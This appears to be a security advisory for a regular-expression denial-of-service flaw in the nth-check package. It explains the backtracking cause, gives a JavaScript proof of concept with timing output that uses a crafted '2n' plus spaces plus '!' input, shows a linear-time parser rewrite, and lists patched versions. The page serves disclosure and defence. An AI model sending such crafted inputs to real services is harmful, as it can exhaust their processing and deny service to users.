Asymmetric denial of service - ReDoS In node-nth-check
Description
Inefficient Regular Expression Complexity in nth-check. nth-check contains a Regular Expression Denial of Service (ReDoS) vulnerability: parsing a crafted, invalid CSS nth-check expression (an An+B formula of the kind used by :nth-child()) takes time that grows superlinearly with the length of the input, so an attacker who can feed such a formula to the parser can tie up the process.
The ReDoS in the parsing regex stems mainly from the sub-pattern \s*(?:([+-]?)\s*(\d+))?. The leading \s* and the \s* inside the optional group are adjacent quantifiers that can match the same run of whitespace, so when the trailing \d+ fails (here on the "!" that follows the spaces) the engine backtracks through every way of dividing the run between them. The work grows quadratically with the length of the whitespace run, which the following code exploits.
Proof of Concept
```javascript
// PoC.js
var nthCheck = require("nth-check")
// Each iteration adds 10000 spaces between "2n" and a trailing "!" that makes the
// formula invalid. The loop bound is far larger than needed; interrupt the script
// once the growth is visible (the output below shows the first five iterations).
for(var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = '2n' + ' '.repeat(i*10000)+"!";
  try {
    nthCheck.parse(attack_str)
  }
  catch(err) {
    // parse() rejects the formula, but only after the backtracking has run
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
  }
}
```
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
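The description and the PoC above together describe the failure mode; the following added example (written for this page, not code from the nth-check project or from the advisory author) puts a regex built around the quoted sub-pattern next to a hand-written single-pass scanner for the same An+B grammar, and times both on input of the PoC's shape. The fully anchored regex VULNERABLE_RE, the function names parseWithRegex, parseSafe, timeMs and craftedInput, and the sample formulas are assumptions made for this example; confirm the exact pattern against the nth-check release you audit before quoting it.

```javascript
// Added example, not code from nth-check or from the advisory. It contrasts the
// quadratic backtracking behind the PoC with a scanner that consumes each
// character at most once and therefore rejects the crafted input in linear time.
//
// ASSUMPTION: VULNERABLE_RE is the advisory's sub-pattern \s*(?:([+-]?)\s*(\d+))?
// anchored behind an optional "An" prefix; verify it against the real release.
const VULNERABLE_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

function parseError(formula) {
  return new Error(`n-th rule couldn't be parsed ('${formula}')`);
}

// Regex-based parser: returns [a, b] for an "An+B" formula, or throws.
function parseWithRegex(formula) {
  const f = formula.trim().toLowerCase();
  if (f === "even") return [2, 0];
  if (f === "odd") return [2, 1];
  const m = VULNERABLE_RE.exec(f); // quadratic on "2n" + spaces + "!"
  if (!m) throw parseError(formula);
  const coef = m[1] ? m[1].slice(0, -1) : "0"; // strip the trailing "n"
  const a = coef === "" || coef === "+" ? 1 : coef === "-" ? -1 : parseInt(coef, 10);
  const b = m[3] ? (m[2] === "-" ? -1 : 1) * parseInt(m[3], 10) : 0;
  return [a, b];
}

// Hand-written scanner for the same grammar: no backtracking, so the cost is
// linear in the input length. isWs covers ASCII whitespace only (the regex's
// \s also accepts Unicode spaces), which is enough to show the contrast.
function parseSafe(formula) {
  const f = formula.trim().toLowerCase();
  if (f === "even") return [2, 0];
  if (f === "odd") return [2, 1];

  let i = 0;
  const isWs = (c) => c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\f";
  const skipWs = () => { while (i < f.length && isWs(f[i])) i++; };
  // +1/-1 for an explicit sign (consumed), 0 when there is none.
  const readSign = () => (f[i] === "+" ? (i++, 1) : f[i] === "-" ? (i++, -1) : 0);
  const readDigits = () => {
    const start = i;
    while (i < f.length && f[i] >= "0" && f[i] <= "9") i++;
    return f.slice(start, i); // "" when no digit was present
  };

  let a = 0;
  let b = 0;
  const leadSign = readSign();
  let digits = readDigits();

  if (f[i] === "n") {
    i++; // "An" part: a bare "n" means a coefficient of 1
    a = (leadSign || 1) * (digits === "" ? 1 : parseInt(digits, 10));
    skipWs(); // optional "+B"/"-B" part; whitespace may surround the sign
    const bSign = readSign();
    skipWs();
    digits = readDigits();
    if (digits === "") {
      if (bSign !== 0) throw parseError(formula); // dangling sign such as "2n+"
    } else {
      b = (bSign || 1) * parseInt(digits, 10);
    }
  } else {
    // No "n": the whole formula is B, with whitespace allowed after the sign.
    if (digits === "") {
      skipWs();
      digits = readDigits();
    }
    if (digits === "") {
      if (leadSign !== 0) throw parseError(formula);
    } else {
      b = (leadSign || 1) * parseInt(digits, 10);
    }
  }
  if (i !== f.length) throw parseError(formula); // trailing garbage such as "!"
  return [a, b];
}

// Wall-clock cost of one parse attempt in ms; a rejection is the expected outcome.
function timeMs(parser, formula) {
  const t0 = Date.now();
  try { parser(formula); } catch (e) { /* invalid formula, as in the PoC */ }
  return Date.now() - t0;
}

// Constructed input with the same shape as the PoC's attack_str.
function craftedInput(spaces) {
  return "2n" + " ".repeat(spaces) + "!";
}

// Demo: grow the whitespace run and watch the regex cost climb while the
// scanner stays flat. Run with: node redos-compare.js
if (typeof require !== "undefined" && require.main === module) {
  for (const n of [5000, 10000, 20000]) {
    const s = craftedInput(n);
    console.log(`${s.length} chars: regex ${timeMs(parseWithRegex, s)} ms, scanner ${timeMs(parseSafe, s)} ms`);
  }
}
```

The scanner accepts and rejects the same formulas as the regex on ordinary input, which is what a replacement for a vulnerable pattern has to guarantee; the point of the grammar-driven rewrite is that whitespace is consumed exactly once, so there is no split to backtrack over.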
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
| Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
| debian 12 | node-nth-check | | 2.0.1-1 |
| npm | nth-check | | 2.0.1 |
| debian 13 | node-nth-check | | 2.0.1-1 |
| debian 14 | node-nth-check | | 2.0.1-1 |
| debian 11 | node-nth-check | | 2.0.0-1+deb11u1 |